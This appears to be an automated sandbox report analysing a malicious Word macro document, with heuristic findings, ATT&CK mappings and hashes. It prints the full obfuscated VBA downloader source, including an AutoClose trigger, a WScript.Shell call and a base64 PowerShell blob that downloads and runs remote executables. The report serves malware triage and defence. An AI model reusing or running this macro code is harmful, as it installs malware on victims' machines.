MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The sample contains VBA macros that are triggered by the AutoClose event. These macros utilize WScript.Shell and CreateObject to download a second-stage payload from the reconstructed URL 'http://okijgftrbbgkjwzeoew.com/'. The ClamAV detection 'Doc.Downloader.Powload-6707242-0' further supports its nature as a downloader. The presence of WScript.Shell and the download functionality strongly indicate a malicious downloader.
Heuristics 8
-
ClamAV: Doc.Downloader.Powload-6707242-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Powload-6707242-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
If chainsawed - necks > 1 Then CreateObject("WScript.Shell").Run outplaying, 0 connivers = False -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
If chainsawed - necks > 1 Then CreateObject("WScript.Shell").Run outplaying, 0 connivers = False -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() pyrobelonite = Array("b", "z", "w", "G", "X", "6", "F", "l", "b", "2", "g", "l", "2", "8", "1", "w", "1", "O", "1", "F", "1", "4", "1", "X", "1", "C", "1", "F", "1", "u", "1", "u", "1", "r", "1", "F", "1", "x", "1", "F", "1", "2", "q", "3", "w", "J", "x", "R", "y", "2", "q", "J", "x", "F", "l", "2", "N", "e", "6", "I", "M", "M", "2", "q", "J", "z", "2") -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3019 bytes |
SHA-256: b99c43b31f60eda4c8d86744d971aa2ae0c32997f6215f0db40c6a1712dd2b69 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function docent(pyrobelonite)
patterist = Array("G", "w", "O", "X", "J", "N", "M", "e", "I", "F", "1", "3", "8", "2", "r", "x", "u", "z", "R", "q", "C", "b", "g", "6", "4", "y", "l")
crayonist = Array("m", "o", "w", "S", "E", "B", "s", "y", "a", "e", "^", "N", "P", " ", ".", "x", "l", "C", "i", "-", "h", "%", "/", "p", "r", "t", "c")
mcclure = vbNullString
For Each morbidize In pyrobelonite
canopying = sinewless(morbidize, patterist, UBound(patterist))
If canopying > -1 Then
mcclure = crayonist(canopying) & mcclure
End If
Next
docent = StrReverse(mcclure)
End Function
Public Function sinewless(felicitator, lithology, dioecisms)
abbassi = 0
hostilities = -1
For abbassi = 0 To dioecisms
If lithology(abbassi) = felicitator Then
hostilities = abbassi
End If
Next
sinewless = hostilities
End Function
Sub AutoClose()
pyrobelonite = Array("b", "z", "w", "G", "X", "6", "F", "l", "b", "2", "g", "l", "2", "8", "1", "w", "1", "O", "1", "F", "1", "4", "1", "X", "1", "C", "1", "F", "1", "u", "1", "u", "1", "r", "1", "F", "1", "x", "1", "F", "1", "2", "q", "3", "w", "J", "x", "R", "y", "2", "q", "J", "x", "F", "l", "2", "N", "e", "6", "I", "M", "M", "2", "q", "J", "z", "2")
sterilizing = "IAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvAG8AawBpAGoAZwB0AGYAcgBiAGcAawB6AGEAbQBoAGoAdwBlAGUAbwByAC4AYwBvAG0ALwBTAFMALwBnAGUAcwBoAC4AdAB6AG0AJwAsACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAIAArACAAJwBcAC0ANgA2ADIANAA1ADEANwA2ADIALgBlAHgAZQAnACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAnAFwALQA2ADYAMgA0ADUAMQA3ADYAMgAuAGUAeABlACcAOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAG8AawBpAGoAZwB0AGYAcgBiAGcAawB6AGEAbQBoAGoAdwBlAGUAbwByAC4AYwBvAG0ALwBzAC4AcABoAHAAPwBpAGQAPQBnAGUAcwBoACcAKQA7AEkARQBYACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZwBpAGQAcgBvAGwAbwBnAGkAawBhAC4AcgB1AC8AUwB0AGEAdAAuAGMAbwB1AG4AdAAnACkAKQA7AA=="
attingent = docent(pyrobelonite)
Application.Run "vermix", attingent + sterilizing
End Sub
Private Sub vermix(outplaying)
necks = DateDiff("s", #1/1/1970#, Now())
connivers = True
While connivers
chainsawed = DateDiff("s", #1/1/1970#, Now())
If chainsawed - necks > 1 Then
CreateObject("WScript.Shell").Run outplaying, 0
connivers = False
End If
Wend
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 13312 bytes |
SHA-256: ea7a389e8683cfd12cd98f66a782bc3d02e889fd6e1ba2c6e9f2ccc5e870edb5 |
|||
|
Detection
ClamAV:
Doc.Downloader.Powload-6707242-0
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.